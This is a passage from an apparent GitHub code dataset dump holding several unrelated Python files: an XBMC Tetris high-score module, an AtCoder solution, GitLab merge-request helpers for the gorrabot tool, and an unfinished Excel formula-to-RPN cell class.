- \" +g)\r\n\t\ttry:\r\n\t\t\treturn self.ohs.create_new_game(g)\r\n\t\texcept Exception:\r\n\t\t\ttraceback.print_exc()\r\n\t\t\treturn \"0\"\r\n\r\nONLINEHIGHSCORE=SafeOnlineHighScores()\r\n\r\nclass SubmitDialog(xbmcgui.WindowDialog):\r\n\tdef __init__(self,parent=None):\r\n\t\tnoStretch(self)\r\n\t\tself.parent = parent\r\n\t\tx = self.parent.posX + 50\r\n\t\ty = self.parent.posY + 130\r\n\t\timagedir = self.parent.imagedir\r\n\t\tself.addControl(xbmcgui.ControlImage(x,y,243,113, imagedir+'submit.png'))\r\n\t\tself.btnUsername = xbmcgui.ControlButton(x + 20, y+10, 100, 25, 'Username:', textOffsetY=3,focusTexture=imagedir+\"button-focus.png\",noFocusTexture=imagedir+\"button-nofocus.png\")\r\n\t\tself.btnPassword = xbmcgui.ControlButton(x + 20, y+40, 100, 25, 'Password:', textOffsetY=3,focusTexture=imagedir+\"button-focus.png\",noFocusTexture=imagedir+\"button-nofocus.png\")\r\n\t\tself.lblUsername = xbmcgui.ControlLabel(x+135, y+10+3, 100, 25, '')\r\n\t\tself.lblPassword = xbmcgui.ControlLabel(x+135, y+40+3, 100, 25, '')\r\n\t\tself.btnSubmit = xbmcgui.ControlButton(x+20, y+75, 100, 25, 'Submit',focusTexture=imagedir+\"button-focus.png\",noFocusTexture=imagedir+\"button-nofocus.png\")\r\n\t\t\r\n\t\tself.addControl(xbmcgui.ControlLabel(0,0,0,0,''))\r\n\t\tself.addControl(xbmcgui.ControlLabel(0,0,0,0,''))\r\n\t\tself.addControl(xbmcgui.ControlLabel(0,0,0,0,''))\r\n\t\tself.addControl(xbmcgui.ControlLabel(0,0,0,0,''))\r\n\t\tself.addControl(xbmcgui.ControlLabel(0,0,0,0,''))\r\n\t\tself.addControl(xbmcgui.ControlLabel(0,0,0,0,''))\r\n\t\tfor control in (self.btnUsername, self.btnPassword, self.btnSubmit, self.lblUsername, self.lblPassword):\r\n\t\t\tself.addControl(control)\r\n\t\t\r\n\t\tself.btnUsername.controlUp(self.btnSubmit)\r\n\t\tself.btnPassword.controlUp(self.btnUsername)\r\n\t\tself.btnSubmit.controlUp(self.btnPassword)\r\n\t\tself.btnUsername.controlDown(self.btnPassword)\r\n\t\tself.btnPassword.controlDown(self.btnSubmit)\r\n\t\tself.btnSubmit.controlDown(self.btnUsername)\r\n\t\tself.setFocus(self.btnSubmit)\r\n\t\t\r\n\t\tself.username = ''\r\n\t\tself.password = ''\r\n\t\tself.userID = \"0\"\r\n\t\r\n\tdef setUsername(self,username):\r\n\t\tself.username = username\r\n\t\tself.lblUsername.setLabel(username)\r\n\t\tself.userID = \"0\"\r\n\t\t\r\n\tdef setPassword(self,password):\r\n\t\tself.password = password\r\n\t\tself.lblPassword.setLabel('*'*len(password))\r\n\t\tself.userID = \"0\"\r\n\t\r\n\tdef promptUsername(self):\r\n\t\tself.setUsername(unikeyboard(self.username, 'Enter Username'))\r\n\t\r\n\tdef promptPassword(self):\r\n\t\tif self.username == '':\r\n\t\t\tself.setPassword(unikeyboard(self.password, 'Enter Password'))\r\n\t\telse:\r\n\t\t\tself.setPassword(unikeyboard(self.password, 'Enter Password for ' + self.username))\r\n\t\t\r\n\tdef getUserID(self,refresh=True):\r\n\t\tif not self.userID == \"0\" and not refresh:\r\n\t\t\treturn self.userID\r\n\t\tif self.username == \"\":\tself.promptUsername()\r\n\t\tif self.username == \"\": return \"0\"\r\n\t\tif self.password == \"\":\tself.promptPassword()\t\t\t\r\n\t\tif self.password == \"\":\treturn \"0\"\t\t\t\r\n\t\t\t\r\n\t\tuserID = ONLINEHIGHSCORE.get_user_id(self.username,self.password)\r\n\t\tLOG(\"GUID ID=\"+userID)\r\n\t\tif userID == \"0\":\r\n\t\t\tif xbmcgui.Dialog().yesno(self.parent.gamename, 'Account for username '+self.username+' not found', 'Create new account?'):\r\n\t\t\t\tuserID = ONLINEHIGHSCORE.create_new_user(self.username, self.password)\r\n\t\treturn 
userID\r\n\t\r\n\tdef\tsubmitScore(self,score):\r\n\t\tLOG(\"SS \" + str(score) + '-'+str(self.userID))\r\n\t\tif self.userID == \"0\":\r\n\t\t\tself.userID = self.getUserID()\r\n\t\tLOG(\"SS2 \" + self.userID)\r\n\t\tif self.userID == \"0\":\r\n\t\t\tLOG(\"SS2.1\")\r\n\t\t\treturn False\r\n\t\tretVal = ONLINEHIGHSCORE.insert_new_highscore(self.parent.gameID, self.userID, str(score))\r\n\t\tLOG(\"SS4 \" + str(retVal))\t\r\n\t\treturn retVal\r\n\t\t\r\n\tdef onControl(self, control):\r\n\t\tLOG('SD - OC1 - ' + str(control.getId()))\r\n\t\tif control == self.btnUsername:\r\n\t\t\tself.promptUsername()\r\n\t\telif control == self.btnPassword:\r\n\t\t\tself.promptPassword()\r\n\t\telif control == self.btnSubmit:\r\n\t\t\tif not self.submitScore(self.parent.score) == \"0\":\r\n\t\t\t\txbmcgui.Dialog().ok(self.parent.gamename, 'Submission Successful!')\r\n\t\t\t\tself.close()\r\n\t\t\telse:\r\n\t\t\t\txbmcgui.Dialog().ok(self.parent.gamename, 'Submission Failure')\r\n\t\t\t\r\n\r\n\tdef onAction(self, action):\r\n\t\tif action in (ACTION_PREVIOUS_MENU, ACTION_PARENT_DIR, ACTION_STOP):\r\n\t\t\tself.close()\t\t\t\r\n\t\t\r\n\t\r\nclass HighScoreDialog(xbmcgui.WindowDialog):\r\n\tdef __init__(self,parent=None):\r\n\t\tnoStretch(self)\r\n\t\tself.parent = parent\r\n\t\tself.posX = parent.posX -55\r\n\t\tself.posY = parent.posY + 30\r\n\t\t\r\n\t\tself.hsFileName = TETRIS_SCORES % self.parent.gamename\r\n\t\tself.localHighScores = self.loadLocalHighScores()\r\n\t\tself.onlineHighScores = []\r\n\t\t\r\n\t\tself.buildGui()\r\n\t\tself.currentTab = 0 #local\r\n\t\tself.populateList(self.localHighScores)\r\n\t\t\r\n\t\t\r\n\t\t\r\n\tdef buildGui(self):\r\n\t\tself.addControl(xbmcgui.ControlImage(self.posX,self.posY,270,355, self.parent.imagedir+'highscore.png'))\r\n\t\tself.imgtabLocal = [\r\n\t\t\txbmcgui.ControlImage(self.posX + 20, self.posY+9, 80, 32,self.parent.imagedir+'tab-noselect-nofocus.png'),\r\n\t\t\txbmcgui.ControlImage(self.posX + 20, self.posY+9, 80, 32,self.parent.imagedir+'tab-noselect-focus.png'),\r\n\t\t\txbmcgui.ControlImage(self.posX + 20, self.posY+9, 80, 32,self.parent.imagedir+'tab-select-nofocus.png'),\r\n\t\t\txbmcgui.ControlImage(self.posX + 20, self.posY+9, 80, 32,self.parent.imagedir+'tab-select-focus.png')]\r\n\t\tself.imgtabOnline = [\r\n\t\t\txbmcgui.ControlImage(self.posX + 80, self.posY+9, 80, 32,self.parent.imagedir+'tab-noselect-nofocus.png'),\r\n\t\t\txbmcgui.ControlImage(self.posX + 80, self.posY+9, 80, 32,self.parent.imagedir+'tab-noselect-focus.png'),\r\n\t\t\txbmcgui.ControlImage(self.posX + 80, self.posY+9, 80, 32,self.parent.imagedir+'tab-select-nofocus.png'),\r\n\t\t\txbmcgui.ControlImage(self.posX + 80, self.posY+9, 80, 32,self.parent.imagedir+'tab-select-focus.png')]\r\n\t\t# This adds the textures so that the select textures are in front of the unselected textures... 
this way tabs can have a little overlap and it looks nicer\r\n\t\tfor i in range(0,4): \r\n\t\t\tself.addControl(self.imgtabLocal[i])\r\n\t\t\tself.imgtabLocal[i].setVisible(False)\r\n\t\t\tself.addControl(self.imgtabOnline[i])\r\n\t\t\tself.imgtabOnline[i].setVisible(False)\r\n\t\tself.addControl(xbmcgui.ControlImage(self.posX+5,self.posY+38,263,4, self.parent.imagedir+'seperator.png'))\r\n\t\tself.btnLocal = xbmcgui.ControlButton(self.posX + 20, self.posY+12, 70, 25, 'Local',focusTexture='',noFocusTexture='')\r\n\t\tself.btnOnline = xbmcgui.ControlButton(self.posX + 80, self.posY+12, 70, 25, 'Online',focusTexture='',noFocusTexture='')\r\n\t\tself.btnRefresh = xbmcgui.ControlButton(self.posX + 180, self.posY+10, 70, 25, 'Refresh',focusTexture=self.parent.imagedir+\"button-focus.png\",noFocusTexture=self.parent.imagedir+\"button-nofocus.png\")\r\n\t\tself.lstHighScores = xbmcgui.ControlList(self.posX +20, self.posY + 50, 230, 320)\r\n\t\tself.addControl(xbmcgui.ControlLabel(0,0,0,0,''))\r\n\t\tself.addControl(self.btnLocal)\r\n\t\tself.addControl(self.btnOnline)\r\n\t\tself.addControl(self.lstHighScores)\r\n\t\tself.addControl(self.btnRefresh)\r\n\t\t\r\n\t\tself.btnLocal.controlLeft(self.btnRefresh)\r\n\t\tself.btnRefresh.controlLeft(self.btnOnline)\r\n\t\tself.btnOnline.controlLeft(self.btnLocal)\r\n\t\tself.btnLocal.controlRight(self.btnOnline)\r\n\t\tself.btnRefresh.controlRight(self.btnLocal)\r\n\t\tself.btnOnline.controlRight(self.btnRefresh)\r\n\t\t#self.btnRefresh.setVisible(False)\r\n\t\tself.lstHighScores.setEnabled(False)\r\n\t\tself.btnRefresh.setEnabled(False)\r\n\t\tself.setFocus(self.btnLocal)\r\n\t\tself.imgtabLocal[3].setVisible(True)\r\n\t\tself.imgtabOnline[0].setVisible(True)\r\n\t\t\r\n\tdef isHighScore(self,score):\r\n\t\tscores = [int(s[1]) for s in self.localHighScores]\r\n\t\tscores.append(int(score))\r\n\t\tscores.sort(reverse=True)\r\n\t\tif scores.index(int(score)) < self.parent.maxScoreLength:\r\n\t\t\treturn True\r\n\t\treturn False\r\n\t\r\n\tdef parseScores(self, data):\r\n\t\tLOG('Parsing data ')\r\n\t\tscores = []\r\n\t\tfor line in data.split(\"\\n\"):\r\n\t\t\tnameScore = line.split(\"|\")\r\n\t\t\tif len(nameScore) == 2:\r\n\t\t\t\tscores.append((nameScore[0],nameScore[1]))\r\n\t\tLOG(\"scores\")\r\n\t\tLOG(scores)\r\n\t\treturn scores\r\n\t\r\n\tdef populateList(self,scores):\r\n\t\tLOG(\"PL setting to \"+str(scores))\r\n\t\txbmcgui.lock()\r\n\t\tself.updateTabImages()\r\n\t\tself.lstHighScores.reset()\r\n\t\tfor name,score in scores:\r\n\t\t\tself.lstHighScores.addItem(xbmcgui.ListItem(name,str(score)))\r\n\t\txbmcgui.unlock()\r\n\t\r\n\tdef loadLocalHighScores(self):\r\n\t\tdata = ''\r\n\t\tif os.path.exists(self.hsFileName):\r\n\t\t\tinput = open(self.hsFileName,'r')\r\n\t\t\tdata = input.read()\r\n\t\t\tinput.close()\t\t\r\n\t\treturn self.parseScores(data)\r\n\t\t\r\n\tdef loadOnlineHighScores(self):\r\n\t\tLOG(\"LOH\")\r\n\t\tscores = self.parseScores(ONLINEHIGHSCORE.get_highscore(self.parent.gameID))\r\n\t\tLOG(\"LOH score: \" + str(scores))\r\n\t\treturn scores\r\n\t\r\n\tdef replaceName(self, oldName, newName, score):\r\n\t\ttry: idx = self.localHighScores.index((oldName,score))\r\n\t\texcept: return False\r\n\t\tself.localHighScores[idx] = (newName,score)\r\n\t\tself.currentTab = 0\r\n\t\tself.populateList(self.localHighScores)\r\n\t\treturn True\r\n\t\r\n\tdef addScore(self,name,score):\r\n\t\r\n\t\tLOG('AS1 - ' + str(name) + '|'+str(score))\r\n\t\tself.localHighScores.append((name,score)) #add\r\n\t\tself.localHighScores.sort(key=lambda x: int(x[1]),reverse=True) 
#sort\r\n\t\tself.localHighScores = self.localHighScores[0:min(len(self.localHighScores),self.parent.maxScoreLength)] #truncate\r\n\t\tself.populateList(self.localHighScores)\r\n\t\tLOG('AS5')\r\n\t\ttry:\r\n\t\t\treturn self.localHighScores.index((name,score)) #return index or -1\r\n\t\texcept Exception:\r\n\t\t\treturn -1\r\n\t\r\n\tdef getHighestScore(self):\r\n\t\tif len(self.localHighScores) > 0:\r\n\t\t\treturn self.localHighScores[0]\r\n\t\telse:\r\n\t\t\treturn ('-------','0')\r\n\t\r\n\tdef saveHighScores(self):\r\n\t\toutput = open(self.hsFileName,'w')\r\n\t\tLOG(\"Scores:\" + str(self.localHighScores))\r\n\t\tscoreStrings = [str(x[0]) +\"|\"+str(x[1]) for x in self.localHighScores]\r\n\t\toutput.write(\"\\n\".join(scoreStrings))\r\n\t\toutput.close()\r\n\t\r\n\tdef updateTabImages(self):\r\n\t\tLOG(\"UTI1\")\r\n\t\tfocusControl = self.getFocus()\r\n\t\timgidx = [0,0]\r\n\t\tif focusControl == self.btnLocal:\r\n\t\t\tif self.currentTab == 0: imgidx = [3,0]\r\n\t\t\telse: imgidx = [1,2]\r\n\t\telif focusControl == self.btnOnline:\r\n\t\t\tif self.currentTab == 1: imgidx = [0,3]\r\n\t\t\telse: imgidx = [2,1]\t\t\r\n\t\telse:\r\n\t\t\tif self.currentTab == 0: imgidx = [2,0]\r\n\t\t\telse: imgidx = [0,2]\r\n\t\tLOG(\"UTI2 \" + str(imgidx))\r\n\t\tfor i in range(4):\r\n\t\t\tself.imgtabLocal[i].setVisible(i==imgidx[0])\r\n\t\t\tself.imgtabOnline[i].setVisible(i==imgidx[1])\r\n\t\t\r\n\tdef onControl(self, control):\r\n\t\tLOG('HS - OC1 - ' + str(control.getId()))\r\n\t\tif control == self.btnLocal:\r\n\t\t\tself.currentTab = 0\r\n\t\t\tself.populateList(self.localHighScores)\r\n\t\t\t#self.btnRefresh.setVisible(False)\r\n\t\t\tself.btnRefresh.setEnabled(False)\r\n\t\tLOG('HS - OC2')\r\n\t\tif control == self.btnOnline:\r\n\t\t\tif len(self.onlineHighScores) == 0:\r\n\t\t\t\tLOG('HS - OC2.1')\r\n\t\t\t\tself.onlineHighScores = self.loadOnlineHighScores()\r\n\t\t\tLOG('HS - OC2.2')\r\n\t\t\tself.currentTab = 1\r\n\t\t\tself.populateList(self.onlineHighScores)\r\n\t\t\t#self.btnRefresh.setVisible(True)\r\n\t\t\tself.btnRefresh.setEnabled(True)\r\n\t\tLOG('HS - OC3')\r\n\t\tif control == self.btnRefresh:\r\n\t\t\tself.currentTab = 1\r\n\t\t\tself.onlineHighScores = self.loadOnlineHighScores()\r\n\t\t\tself.populateList(self.onlineHighScores)\r\n\t\tLOG('HS - OC4')\r\n\t\r\n\tdef onAction(self, action):\r\n\t\tself.updateTabImages()\r\n\t\tLOG('HS - OA1')\r\n\t\tif action in (ACTION_PREVIOUS_MENU, ACTION_PARENT_DIR, ACTION_STOP):\r\n\t\t\tself.close()\r\n\t\r\nWINDOW_NONE = 0\r\nWINDOW_GAME = 3\r\nWINDOW_HIGHSCORE = 1\r\nWINDOW_SUBMIT = 2\r\nclass GameDialog(xbmcgui.WindowDialog):\r\n\tdef __init__(self, gamename='',x=100,y=100, imagedir='', maxScoreLength=10):\r\n\t\tnoStretch(self)\r\n\t\tself.posX = x\r\n\t\tself.posY = y\r\n\t\t# I had a problem with different window dialogs having duplicate ControlIDs\r\n\t\t# This generated two differen onControl events, use self.focusWindow as a lock\r\n\t\tself.focusWindow = WINDOW_GAME \r\n\t\tself.imagedir = imagedir\r\n\t\tself.score = \"0\"\r\n\t\tself.buildGui()\r\n\t\tself.gamename = gamename\r\n\t\tself.gameID = ''\r\n\t\tLOG(\"init gameID is \" + str(self.gameID))\r\n\t\tself.maxScoreLength = maxScoreLength\r\n\t\tself.retVal = True\r\n\t\t\r\n\t\tself.username = ''\r\n\t\tself.dlgSubmit = SubmitDialog(parent=self)\r\n\t\tself.dlgHighScores = HighScoreDialog(parent=self)\r\n\t\t\r\n\tdef buildGui(self):\r\n\t\tself.addControl(xbmcgui.ControlImage(self.posX,self.posY,270,150, self.imagedir+'panel.png'))\r\n\t\tself.btnUsername = 
xbmcgui.ControlButton(self.posX + 20, self.posY+10, 100, 25, 'Name:', textOffsetX=10, textOffsetY=3,focusTexture=self.imagedir+\"button-focus.png\",noFocusTexture=self.imagedir+\"button-nofocus.png\")\r\n\t\tself.lblUsername = xbmcgui.ControlLabel(self.posX+140, self.posY+13, 100, 25, '')\r\n\t\tself.lblScore\t= xbmcgui.ControlLabel(self.posX+140, self.posY+40, 100, 25, '0')\r\n\t\tself.addControl(xbmcgui.ControlLabel(self.posX+30, self.posY+40, 100, 25, 'Score:'))\r\n\t\tself.btnNewGame = xbmcgui.ControlButton(self.posX + 20, self.posY+75, 100, 25, 'Play Again',textOffsetX=10, textOffsetY=3,focusTexture=self.imagedir+\"button-focus.png\",noFocusTexture=self.imagedir+\"button-nofocus.png\")\r\n\t\tself.btnHighScores = xbmcgui.ControlButton(self.posX + 130, self.posY+75, 120, 25, 'High Scores',textOffsetX=10, textOffsetY=3,focusTexture=self.imagedir+\"button-focus.png\",noFocusTexture=self.imagedir+\"button-nofocus.png\")\r\n\t\tself.btnSubmit = xbmcgui.ControlButton(self.posX + 130, self.posY+105, 120, 25, 'Submit Online',textOffsetX=10, textOffsetY=3,focusTexture=self.imagedir+\"button-focus.png\",noFocusTexture=self.imagedir+\"button-nofocus.png\")\r\n\t\tself.btnQuit = xbmcgui.ControlButton(self.posX + 20, self.posY+105, 100, 25, 'Quit',textOffsetX=10, textOffsetY=3,focusTexture=self.imagedir+\"button-focus.png\",noFocusTexture=self.imagedir+\"button-nofocus.png\")\r\n\t\tfor control in (self.btnNewGame, self.btnHighScores, self.btnQuit, self.btnSubmit, self.btnUsername, self.lblUsername, self.lblScore):\r\n\t\t\tself.addControl(control)\r\n\t\tself.btnNewGame.setNavigation(self.btnUsername, self.btnQuit, self.btnHighScores, self.btnHighScores)\r\n\t\tself.btnHighScores.setNavigation(self.btnUsername, self.btnSubmit, self.btnNewGame, self.btnNewGame)\r\n\t\tself.btnQuit.setNavigation(self.btnNewGame, self.btnUsername, self.btnSubmit, self.btnSubmit)\r\n\t\tself.btnSubmit.setNavigation(self.btnHighScores, self.btnUsername, self.btnQuit, self.btnQuit)\r\n\t\tself.btnUsername.controlDown(self.btnNewGame)\r\n\t\tself.setFocus(self.btnNewGame)\r\n\t\t\r\n\tdef showDialog(self,score):\r\n\t\tLOG(\"Show Dialog\")\r\n\t\tself.score = str(score)\r\n\t\tself.lblScore.setLabel(str(score))\r\n\t\twhile self.username == '':\r\n\t\t\tself.setUsername(unikeyboard(self.username, \"Enter New Player Name\"))\r\n\t\t\tif self.dlgSubmit.username == '':\r\n\t\t\t\tself.dlgSubmit.setUsername(self.username)\r\n\t\tself.dlgHighScores.addScore(self.username,str(score))\r\n\t\tself.gameID = self.getGameID(self.gamename)\r\n\t\t#xbmc.enableNavSounds(True)\r\n\t\tself.focusWindow = WINDOW_GAME\r\n\t\tself.doModal() #leaves xbmcgui locked\r\n\t\t#xbmc.enableNavSounds(False)\r\n\t\tLOG(\"SD7\")\r\n\t\tself.dlgHighScores.saveHighScores()\r\n\t\txbmcgui.unlock()\r\n\t\tLOG(\"SD8\")\r\n\t\treturn self.retVal\r\n\t\t\r\n\t\t\r\n\t\t\r\n\tdef getGameID(self,gamename):\r\n\t\tLOG('gGID ' +self.gameID)\r\n\t\tif self.gameID == '':\r\n\t\t\tself.gameID = ONLINEHIGHSCORE.get_game_id(gamename)\t\t\r\n\t\tif self.gameID == \"0\":\r\n\t\t\tLOG(\"game not found\");\r\n\t\t\tself.gameID = ONLINEHIGHSCORE.create_new_game(gamename)\r\n\t\treturn self.gameID\r\n\r\n\t\t\r\n\tdef setUsername(self,username):\r\n\t\tself.username = username\r\n\t\tself.lblUsername.setLabel(username)\r\n\t\r\n\tdef onControl(self, control):\r\n\t\tif not self.focusWindow == WINDOW_GAME:\r\n\t\t\treturn\r\n\t\tLOG('OC1 - ' + str(control.getId()))\r\n\t\tif control == self.btnUsername:\r\n\t\t\toldname = 
self.username\r\n\t\t\tself.setUsername(unikeyboard(self.username, \"Enter New Name\"))\r\n\t\t\tself.dlgHighScores.replaceName(oldname, self.username, self.score)\r\n\t\t\tif self.dlgSubmit.username == '':\r\n\t\t\t\tself.dlgSubmit.setUsername(self.username)\r\n\t\tLOG('OC2')\r\n\t\tif control == self.btnNewGame:\r\n\t\t\tLOG('OC2.3')\r\n\t\t\tself.retVal = True\r\n\t\t\txbmcgui.lock()\r\n\t\t\tself.close()\r\n\t\tLOG('OC3')\r\n\t\tif control == self.btnQuit:\r\n\t\t\tself.retVal = False\r\n\t\t\txbmcgui.lock()\r\n\t\t\tself.close()\r\n\t\tLOG('OC4')\r\n\t\tif control == self.btnSubmit:\r\n\t\t\tself.focusWindow = WINDOW_SUBMIT\r\n\t\t\tself.dlgSubmit.doModal()\r\n\t\t\tself.focusWindow = WINDOW_GAME\r\n\t\tLOG('OC5')\r\n\t\tif control == self.btnHighScores:\r\n\t\t\tself.focusWindow = WINDOW_HIGHSCORE\r\n\t\t\tself.dlgHighScores.doModal()\r\n\t\t\tself.focusWindow = WINDOW_GAME\r\n\t\tLOG('OC6')\r\n\r\n\tdef onAction(self, action):\r\n\t\tif not self.focusWindow == WINDOW_GAME:\r\n\t\t\treturn\r\n\t\tif action in (ACTION_PREVIOUS_MENU, ACTION_PARENT_DIR, ACTION_STOP):\r\n\t\t\tself.focusWindow = WINDOW_NONE\r\n\t\t\tself.close()","repo_name":"tcowans/passion-xbmc","sub_path":"addons/dharma/script.game.tetris/scores.py","file_name":"scores.py","file_ext":"py","file_size_in_byte":19135,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15103313479","text":"H,W=map(int,input().split())\r\nA=[]\r\nindh=[]\r\nindw=[]\r\nA=[list(input()) for _ in range(H)] \r\nfor i in reversed(range(H)):\r\n if set(A[i])==set('.'):\r\n A.pop(i)\r\nimport numpy as np\r\nAT=list(np.array(A).T)\r\nansT=[]\r\nfor i in range(W):\r\n if set(AT[i])!=set('.'):\r\n ansT.append(AT[i])\r\nfor a in list(np.array(ansT).T):\r\n print(''.join(a))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc107/B/4870804.py","file_name":"4870804.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"888882820","text":"import datetime\nimport logging\n\nfrom gorrabot.api.gitlab import gitlab_session, GITLAB_API_PREFIX\nfrom gorrabot.api.gitlab.projects import get_project_name\nfrom gorrabot.api.gitlab.utils import paginated_get\nfrom gorrabot.api.utils import parse_api_date\nfrom gorrabot.config import config\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_merge_requests(project_id: int, filters=None):\n if filters is None:\n filters = {}\n url = f'{GITLAB_API_PREFIX}/projects/{project_id}/merge_requests'\n return paginated_get(url, filters)\n\n\ndef mr_url(project_id, iid):\n return '{}/projects/{}/merge_requests/{}'.format(\n GITLAB_API_PREFIX, project_id, iid)\n\n\ndef get_mr_changes(project_id: int, iid: int):\n url = mr_url(project_id, iid) + '/changes'\n res = gitlab_session.get(url)\n res.raise_for_status()\n return res.json()['changes']\n\n\ndef get_mr(project_id: int, iid: int):\n url = f'{GITLAB_API_PREFIX}/projects/{project_id}/merge_requests/{iid}'\n res = gitlab_session.get(url)\n res.raise_for_status()\n return res.json()\n\n\ndef get_mr_last_commit(mr: dict):\n project_id = mr['source_project_id']\n url = mr_url(project_id, mr['iid']) + '/commits'\n res = gitlab_session.get(url)\n res.raise_for_status()\n try:\n return res.json()[0]\n except IndexError:\n return\n\n\ndef create_mr(project_id: int, mr_data: dict):\n url = (\n f\"{GITLAB_API_PREFIX}/projects/{project_id}/\"\n f\"merge_requests\"\n )\n res = gitlab_session.post(url, 
json=mr_data)\n res.raise_for_status()\n return res.json()\n\n\ndef set_wip(project_id: int, iid: int):\n url = mr_url(project_id, iid)\n res = gitlab_session.get(url)\n res.raise_for_status()\n mr = res.json()\n\n if not mr['work_in_progress'] and not mr['title'].startswith('WIP:') and not mr['title'].startswith('Draft:'):\n data = {\"title\": \"Draft: \" + mr['title']}\n update_mr(project_id, iid, data)\n else:\n logger.info(\"Is currently in WIP/Draft\")\n\n\ndef update_mr(project_id: int, iid: int, data: dict):\n url = mr_url(project_id, iid)\n res = gitlab_session.put(url, json=data)\n res.raise_for_status()\n return res.json()\n\n\ndef get_related_merge_requests(project_id: int, issue_iid: int):\n url = '{}/projects/{}/issues/{}/related_merge_requests'.format(\n GITLAB_API_PREFIX, project_id, issue_iid)\n return paginated_get(url)\n\n\ndef comment_mr(project_id: int, iid: int, body: str, can_be_duplicated=True, min_time_between_comments=None):\n project_name = get_project_name(project_id)\n can_comment_mr = config()['projects'][project_name].get('comment_mr', True)\n\n if not can_comment_mr or not isinstance(can_comment_mr, bool):\n return\n\n if not can_be_duplicated:\n # Ugly hack to drop user mentions from body\n search_title = body.split(': ', 1)[-1]\n res = gitlab_session.get(mr_url(project_id, iid) + '/notes')\n res.raise_for_status()\n comments = res.json()\n if any(search_title in comment['body']\n for comment in comments):\n # This comment has already been made\n return\n elif min_time_between_comments is not None:\n # The comment can be duplicated, but to avoid flooding, wait at least\n # min_time_between_comments to duplicate them\n # Ugly hack to drop user mentions from body\n search_title = body.split(': ', 1)[-1]\n res = gitlab_session.get(mr_url(project_id, iid) + '/notes')\n res.raise_for_status()\n comments = res.json()\n\n def is_recent_comment(comment):\n time_passed = datetime.datetime.utcnow() - parse_api_date(comment['created_at'])\n return time_passed < min_time_between_comments\n\n if any(is_recent_comment(comment) and\n search_title.strip() in comment['body'].strip()\n for comment in comments):\n return\n\n url = mr_url(project_id, iid) + '/notes'\n data = {\"body\": body}\n res = gitlab_session.post(url, json=data)\n res.raise_for_status()\n return res.json()\n","repo_name":"infobyte/gorrabot","sub_path":"gorrabot/api/gitlab/merge_requests.py","file_name":"merge_requests.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"22878718128","text":"#Задача 3. Файлы\r\n\r\nspec_symbol = '@№$%^&*().'\r\nextension_file = ['.txt','.docx']\r\nname_file = input(\"Название файла: \")\r\nwhile True:\r\n for symbol in spec_symbol:\r\n if name_file.startswith(symbol):\r\n print(\"Ошибка: название начинается на один из специальных символов.\")\r\n name_file = input(\"[Error] Введите название файла снова: \")\r\n if name_file.endswith('.txt') == False and name_file.endswith('.docx') == False:\r\n print(\"Ошибка: неверное расширение файла. 
Ожидалось .txt или .docx.\")\r\n        name_file = input(\"[Error] Введите название файла снова: \")\r\n    else:\r\n        print(\"Файл назван верно.\")\r\n        break","repo_name":"ISeravin/skillbox","sub_path":"module18/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36291501976","text":"import logging\nimport traceback\nfrom fastnumbers import fast_real\nlogger = logging.getLogger(__name__)\nfrom rpnnode import RPNNode, OperatorNode, RangeNode, OperandNode, FunctionNode, CellNode\nfrom networkx.classes.digraph import DiGraph\nfrom tokenizer import Tokenizer, Token\n\nclass FormulaParserError(Exception):\n    \"\"\"Raised when an Excel formula cannot be parsed. Minimal assumed definition: make_rpn raises this exception but it is neither defined nor imported elsewhere in this module.\"\"\"\n    pass\n\nclass Cell:\n    \"\"\"\n    Class responsible for creating cell objects from source addresses\n    \"\"\"\n\n    def __init__(self ,address):\n        \"\"\"\n        Each cell object is initalized with:\n        - address, excel formula, value, rpn formula, col_field\n        @param address:\n        \"\"\"\n        self.address = address\n        self.value = None\n        self.prec = []\n        self._formula = None\n        self.rpn = []\n        self.tree = None\n        self.needs_calc = True\n\n    def __repr__(self):\n        '''Represents a cell object by outputting the address, value and excel formula'''\n        cell_str = 'A:{}, V:{}, F:{}'.format(self.address ,self.value ,self.formula)\n        return cell_str\n\n    @property\n    def formula(self):\n        return self._formula\n\n    @formula.setter\n    def formula(self, excel_formula):\n        '''\n        If excel formula is set, this TRIGGERS creation of rpn formula and tree\n        @param excel_formula: excel formula as a string\n        @return: rpn formula\n        '''\n        self._formula = excel_formula\n        logging.debug(\"Processing RPN for formula {} at cell {}\".format(excel_formula,self))\n\n        #First check if formula starts with correct operator\n        if str(excel_formula).startswith(('=','+')):\n            self.rpn = self.make_rpn(excel_formula)\n\n            # creates list of precedents (who do I depend on)\n            self.createPrec()\n\n        # This means formula must be a hardcode\n        else:\n            logging.debug(\"Formula does not start with = or +. 
Creating a hardcode cell\")\n if isinstance(fast_real(self.address),str):\n tok = Token(self.address,Token.OPERAND,\"TEXT\")\n self.rpn.append(OperandNode(tok))\n self.needs_calc = False\n else:\n tok = Token(self.address, Token.OPERAND, \"NUMBER\")\n self.rpn.append(OperandNode(tok))\n\n logging.info(\"RPN is: {}\".format(self.rpn))\n\n def createPrec(self):\n for node in self.rpn:\n if isinstance(node,RangeNode):\n self.prec.extend(node.prec_in_range)\n elif isinstance(node,CellNode):\n self.prec.append(node.prec_in_range)\n\n def make_node(self, token):\n\n #Extract sheet name\n sheet = self.address.split('!')[0]\n\n #Remove absolute reference $\n token.value = token.value.replace('$','')\n\n return RPNNode.create(token, sheet)\n\n\n def make_rpn(self, expression):\n \"\"\"\n Parse an excel formula expression into reverse polish notation\n\n Core algorithm taken from wikipedia with varargs extensions from\n http://www.kallisti.net.nz/blog/2008/02/extension-to-the-shunting-yard-\n algorithm-to-allow-variable-numbers-of-arguments-to-functions/\n \"\"\"\n\n \"\"\"\n Parse an excel formula expression into reverse polish notation\n\n Core algorithm taken from wikipedia with varargs extensions from\n http://www.kallisti.net.nz/blog/2008/02/extension-to-the-shunting-yard-\n algorithm-to-allow-variable-numbers-of-arguments-to-functions/\n \"\"\"\n\n lexer = Tokenizer(expression)\n\n # amend token stream to ease code production\n tokens = []\n for token, next_token in zip(lexer.items, lexer.items[1:] + [None]):\n\n 